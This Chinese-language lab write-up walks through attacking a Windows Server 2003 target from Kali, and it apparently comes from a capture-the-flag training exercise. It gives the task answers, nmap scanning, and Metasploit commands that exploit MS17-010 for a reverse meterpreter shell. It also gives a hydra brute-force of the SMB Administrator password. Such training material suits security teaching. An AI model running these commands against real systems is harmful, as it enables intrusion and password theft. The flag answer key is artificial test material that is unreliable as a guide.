Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统,它基于Windows XP/Windows NT 5.1进行开发,并在同年4月底上市。以下是关于Windows Server 2003的详细介绍:
总的来说,Windows Server 2003是微软推出的一款广泛使用的服务器操作系统,它提供了一系列的功能和改进,但在其生命周期的后期,微软结束了对它的官方支持。
攻击机:Kali 靶机:Windows Server 2003
任务编号 | 任务描述 | 答案格式:flag{xxx} | 分值 |
---|---|---|---|
任务一 | 请提交靶机445端口对应的服务状态信息 | flag{open} | 20 |
任务二 | 请提交靶机首选DNS服务器地址 | flag{192.168.229.2} | 20 |
任务三 | 请提交靶机桌面上111文件夹文档内容 | flag{s4f4s4d4fs45f4s61s31fs4f654s} | 20 |
任务四 | 请提交靶机回收站中文档的内容 | flag{s4f4s4d4fs45f4s61s31fs4f654s} | 20 |
任务五 | 请提交靶机管理员账号密码 | flag{Admin123456…} | 20 |
nmap扫描靶机IP地址及端口开启状态
1、ifconfig查看攻击机Kali的IP地址
2、nmap扫描此IP网段的存活IP以及端口开启状态
*注意:攻击机和靶机均保持启动状态 网络适配器模式均为NAT模式
任务一:flag{open}
service postgresql status
service postgresql start
msfdb init
service postgresql status
msfconsole
db_status
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.229.132
set threads 20
run
出现likely表示存在漏洞
1.利用攻击模块
use exploit/windows/smb/ms17_010_psexec
2.设置被攻击IP
set rhost 192.168.229.132
3.设置攻击端口
set rport 445
4.设置监听IP
set lhost 192.168.229.129
5.设置监听端口
set lport 6666
6.进行攻击
run
*注意:出现meterpreter表示攻击成功!
shell
ipconfig/all
任务二:flag{192.168.229.2}
考虑到进入靶机终端乱码问题,所以选择退出靶机终端,在msf中进行操作
exit
cd C:/
*注意:命令和目录都可以补全
download 111
任务三:flag{s4f4s4d4fs45f4s61s31fs4f654s}
*注意:此文件夹中有多个文件,题目要求是查看文档内容,那么就是doc文档
**任务四:flag{s4f4s4d4fs45f4s61s31fs4f654s} **
什么是SMB协议? SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
hydra -l Administrator -P password.txt smb://192.168.229.132 -vV
-l 指定破解的用户 对特定用户破解
-P 指定密码字典
smb协议
-vV 显示详细过程
通过smb协议对Administrator用户进行密码爆破,并显示爆破的详细过程